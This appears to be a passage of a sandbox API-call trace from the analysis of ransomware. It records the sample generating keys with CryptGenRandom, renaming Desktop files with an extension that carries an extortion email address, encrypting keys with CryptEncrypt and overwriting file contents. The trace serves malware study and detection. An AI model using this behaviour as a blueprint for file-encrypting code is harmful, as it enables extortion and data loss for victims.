	[0099.741] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0xdfcc, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0xdfcc, lpOverlapped=0x0) returned 1
	[0099.742] SetFilePointer (in: hFile=0x384, lDistanceToMove=-57292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.742] WriteFile (in: hFile=0x384, lpBuffer=0x60db90*, nNumberOfBytesToWrite=0xdfcc, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60db90*, lpNumberOfBytesWritten=0x3a1f778*=0xdfcc, lpOverlapped=0x0) returned 1
	[0099.742] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.744] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x60db90 | out: hHeap=0x540000) returned 1
	[0099.744] CloseHandle (hObject=0x384) returned 1
	[0099.745] GetProcessHeap () returned 0x540000
	[0099.745] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.745] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.745] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.745] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589118 | out: hHeap=0x540000) returned 1
	[0099.745] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5891a0 | out: hHeap=0x540000) returned 1
	[0099.745] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5891a0
	[0099.745] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.745] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.745] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.745] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.745] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp", dwFileAttributes=0x80) returned 1
	[0099.745] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp") returned 58
	[0099.745] GetProcessHeap () returned 0x540000
	[0099.745] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xda) returned 0x579d50
	[0099.745] lstrcpyW (in: lpString1=0x579d50, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp"
	[0099.746] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.746] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jynzcsnwalz57i0.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jynzcsnwalz57i0.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.748] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JYnZcsNWalz57I0.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jynzcsnwalz57i0.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.748] GetProcessHeap () returned 0x540000
	[0099.748] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579d50 | out: hHeap=0x540000) returned 1
	[0099.748] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=8121) returned 1
	[0099.748] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1fb9
	[0099.748] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.748] GetProcessHeap () returned 0x540000
	[0099.748] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.748] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.748] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.749] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.750] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.750] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1fb9) returned 0x5ffbb8
	[0099.750] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1fb9) returned 0x601b80
	[0099.750] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.750] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x1fb9, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x1fb9, lpOverlapped=0x0) returned 1
	[0099.750] SetFilePointer (in: hFile=0x384, lDistanceToMove=-8121, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.750] WriteFile (in: hFile=0x384, lpBuffer=0x601b80*, nNumberOfBytesToWrite=0x1fb9, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601b80*, lpNumberOfBytesWritten=0x3a1f778*=0x1fb9, lpOverlapped=0x0) returned 1
	[0099.750] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5ffbb8 | out: hHeap=0x540000) returned 1
	[0099.750] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601b80 | out: hHeap=0x540000) returned 1
	[0099.750] CloseHandle (hObject=0x384) returned 1
	[0099.751] GetProcessHeap () returned 0x540000
	[0099.751] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0099.751] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0099.751] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.751] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.751] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.751] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp", dwFileAttributes=0x80) returned 1
	[0099.751] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp") returned 49
	[0099.751] GetProcessHeap () returned 0x540000
	[0099.751] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc8) returned 0x579d50
	[0099.751] lstrcpyW (in: lpString1=0x579d50, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp"
	[0099.751] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.751] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ing5t3.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ing5t3.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.753] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\InG5T3.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ing5t3.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.753] GetProcessHeap () returned 0x540000
	[0099.754] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579d50 | out: hHeap=0x540000) returned 1
	[0099.754] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=16677) returned 1
	[0099.754] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x4125
	[0099.754] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.754] GetProcessHeap () returned 0x540000
	[0099.754] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.754] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.754] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.755] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.755] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.755] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4125) returned 0x5ffbb8
	[0099.755] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4125) returned 0x603ce8
	[0099.755] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.755] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0x4125, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0x4125, lpOverlapped=0x0) returned 1
	[0099.755] SetFilePointer (in: hFile=0x384, lDistanceToMove=-16677, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.755] WriteFile (in: hFile=0x384, lpBuffer=0x603ce8*, nNumberOfBytesToWrite=0x4125, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603ce8*, lpNumberOfBytesWritten=0x3a1f778*=0x4125, lpOverlapped=0x0) returned 1
	[0099.756] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.756] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.756] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf", dwFileAttributes=0x80) returned 1
	[0099.756] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf") returned 59
	[0099.756] GetProcessHeap () returned 0x540000
	[0099.756] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x579cd8
	[0099.757] lstrcpyW (in: lpString1=0x579cd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf"
	[0099.757] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.757] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hmthic_ic4jp-flb.pdf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hmthic_ic4jp-flb.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.759] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hMthic_IC4jp-FLB.pdf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hmthic_ic4jp-flb.pdf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.759] GetProcessHeap () returned 0x540000
	[0099.759] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579cd8 | out: hHeap=0x540000) returned 1
	[0099.759] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=57335) returned 1
	[0099.759] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xdff7
	[0099.759] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.759] GetProcessHeap () returned 0x540000
	[0099.759] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.759] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.760] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.760] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.760] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.761] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdff7) returned 0x5ffbb8
	[0099.761] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdff7) returned 0x60dbb8
	[0099.761] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.761] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0xdff7, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0xdff7, lpOverlapped=0x0) returned 1
	[0099.762] SetFilePointer (in: hFile=0x384, lDistanceToMove=-57335, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.762] WriteFile (in: hFile=0x384, lpBuffer=0x60dbb8*, nNumberOfBytesToWrite=0xdff7, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60dbb8*, lpNumberOfBytesWritten=0x3a1f778*=0xdff7, lpOverlapped=0x0) returned 1
	[0099.762] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.762] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.762] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf", dwFileAttributes=0x80) returned 1
	[0099.763] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf") returned 63
	[0099.763] GetProcessHeap () returned 0x540000
	[0099.763] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe4) returned 0x579cd8
	[0099.763] lstrcpyW (in: lpString1=0x579cd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf"
	[0099.763] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.763] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hhmfpr1c0a2fre g6vkw.swf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hhmfpr1c0a2fre g6vkw.swf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.765] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HhMfPR1c0a2FRe G6vKW.swf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hhmfpr1c0a2fre g6vkw.swf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.765] GetProcessHeap () returned 0x540000
	[0099.765] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579cd8 | out: hHeap=0x540000) returned 1
	[0099.765] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=61817) returned 1
	[0099.765] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xf179
	[0099.765] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.765] GetProcessHeap () returned 0x540000
	[0099.765] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0099.765] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0099.765] WriteFile (in: hFile=0x384, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0099.766] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0099.766] WriteFile (in: hFile=0x384, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0099.766] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf179) returned 0x5ffbb8
	[0099.766] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf179) returned 0x60ed40
	[0099.766] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.766] ReadFile (in: hFile=0x384, lpBuffer=0x5ffbb8, nNumberOfBytesToRead=0xf179, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5ffbb8*, lpNumberOfBytesRead=0x3a1f778*=0xf179, lpOverlapped=0x0) returned 1
	[0099.767] SetFilePointer (in: hFile=0x384, lDistanceToMove=-61817, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0099.767] WriteFile (in: hFile=0x384, lpBuffer=0x60ed40*, nNumberOfBytesToWrite=0xf179, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60ed40*, lpNumberOfBytesWritten=0x3a1f778*=0xf179, lpOverlapped=0x0) returned 1
	[0099.767] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.767] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.767] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4", dwFileAttributes=0x80) returned 1
	[0099.768] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4") returned 53
	[0099.768] GetProcessHeap () returned 0x540000
	[0099.768] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd0) returned 0x59d258
	[0099.768] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4"
	[0099.768] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\giNQiFO2yu.mp4.12781717671972518758.ex_parvis@aol.com.AIR"
